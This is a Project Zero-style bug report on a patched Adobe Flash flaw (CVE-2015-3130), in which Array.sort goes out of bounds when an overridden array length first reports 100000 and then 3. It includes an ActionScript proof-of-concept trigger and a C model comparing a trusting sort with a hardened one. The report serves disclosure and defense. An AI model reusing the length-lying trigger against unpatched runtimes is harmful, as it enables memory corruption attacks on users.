Starred by 2 users
Status: Fixed
Closed: Jul 2015
Adobe Flash: Array.sort can go out of bounds
Project Member Reported by natashenka@google.com, May 7 2015
If the length of an array is overridden so that it returns a long length, and then later a short one, Array.sort can swap array elements that are out of bounds of the array in memory.

A PoC is as follows:

// Call counter for gl(); controls which length value is reported
var s = 1;

var rec_array:Array = new Array();
rec_array.push({name: "john", city: "omaha", zip: 68144});
rec_array.push({name: "john", city: "kansas city", zip: 72345});
rec_array.push({name: "bob", city: "omaha", zip: 94010});

// Object whose valueOf() is consulted whenever the length is converted
// to a number, so the reported length changes between calls
var n = {valueOf : gl};
rec_array.length = n;

rec_array.sortOn(["name", "city"]);
for(i=0; i<rec_array.length; i++){
    trace(rec_array[i].name + ", " + rec_array[i].city);
}

// Returns a large length on the first two calls and a short one afterwards
function gl(){
    trace(s);
    if(s < 3){
        s++;
        return 100000;
    }else{
        return 3;
    }
}

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
arraysort.swf (826 bytes)
arraysort.fla (4.8 KB)
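The bug class described in the report, modelled in C as an added example (this is not Flash's code and not part of the original report): a script array whose script-visible length comes from an overridable callback (standing in for the PoC's valueOf) while the real allocation is fixed. The trusting sort takes that length as its loop bound, the hardened sort fixes the element count once at entry, clamps it to the real allocation and works on a private copy. The names ScriptArray, lying_length, trusting_sort, hardened_sort and run_scenario, the sample elements and the 64-element lie are all constructed for the example; accesses outside the allocation are counted instead of performed so the model itself stays memory-safe.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of a script array: a fixed backing store plus a
 * script-visible "length" obtained through a callback (the report's
 * overridable valueOf). Not Flash's implementation. */
typedef struct {
    int *data;                      /* real backing store */
    size_t capacity;                /* elements actually allocated */
    size_t (*length_cb)(void *ctx); /* script-visible length */
    void *ctx;
} ScriptArray;

/* Hostile length callback mirroring the PoC: a large length on the first
 * calls, a short one afterwards. 64 stands in for the PoC's 100000. */
typedef struct { int calls; } LieState;

static size_t lying_length(void *ctx)
{
    LieState *st = ctx;
    st->calls++;
    return st->calls < 3 ? 64 : 3;
}

/* Accessors that refuse to touch memory outside the allocation and count
 * each refused access, so we can measure what a trusting sort would do. */
static size_t oob_accesses;

static int get_at(const ScriptArray *a, size_t i)
{
    if (i >= a->capacity) { oob_accesses++; return 0; }
    return a->data[i];
}

static void set_at(ScriptArray *a, size_t i, int v)
{
    if (i >= a->capacity) { oob_accesses++; return; }
    a->data[i] = v;
}

/* Vulnerable pattern: the script-reported length is used as the bound for
 * element reads and writes. Returns the number of out-of-bounds accesses. */
size_t trusting_sort(ScriptArray *a)
{
    oob_accesses = 0;
    size_t n = a->length_cb(a->ctx);        /* script-influenced */
    for (size_t i = 1; i < n; i++) {        /* insertion sort */
        int key = get_at(a, i);
        size_t j = i;
        while (j > 0 && get_at(a, j - 1) > key) {
            set_at(a, j, get_at(a, j - 1));
            j--;
        }
        set_at(a, j, key);
    }
    return oob_accesses;
}

/* Hardened pattern: element count fixed once at entry, clamped to the real
 * allocation, and the sort runs on a private copy so that no later change
 * to the script-visible length can move the bounds. Returns the OOB count. */
size_t hardened_sort(ScriptArray *a)
{
    oob_accesses = 0;
    size_t n = a->length_cb(a->ctx);
    if (n > a->capacity) n = a->capacity;   /* never beyond the allocation */
    int *tmp = malloc((n ? n : 1) * sizeof *tmp);
    if (!tmp) return (size_t)-1;
    memcpy(tmp, a->data, n * sizeof *tmp);
    for (size_t i = 1; i < n; i++) {        /* insertion sort on the copy */
        int key = tmp[i];
        size_t j = i;
        while (j > 0 && tmp[j - 1] > key) { tmp[j] = tmp[j - 1]; j--; }
        tmp[j] = key;
    }
    memcpy(a->data, tmp, n * sizeof *tmp);
    free(tmp);
    return oob_accesses;
}

/* Runs one sort over a constructed 3-element array with the lying length
 * callback; copies the resulting elements to out[] and returns the OOB count. */
size_t run_scenario(size_t (*sort)(ScriptArray *), int out[3])
{
    int data[3] = {30, 10, 20};             /* constructed sample elements */
    LieState st = {0};
    ScriptArray a = { data, 3, lying_length, &st };
    size_t oob = sort(&a);
    memcpy(out, data, sizeof data);
    return oob;
}

int main(void)
{
    int out[3];
    printf("trusting sort: %zu out-of-bounds accesses\n",
           run_scenario(trusting_sort, out));
    printf("hardened sort: %zu out-of-bounds accesses, result %d %d %d\n",
           run_scenario(hardened_sort, out), out[0], out[1], out[2]);
    return 0;
}
```

The defensive point is that the bound a sort (or any bulk operation) indexes with must come from the engine's own allocation, not from a value script code can influence between calls.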
Project Member Comment 1 by natashenka@google.com, May 8 2015
This is PSIRT-3659
Comment 2 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-3130
Comment 3 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 4 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit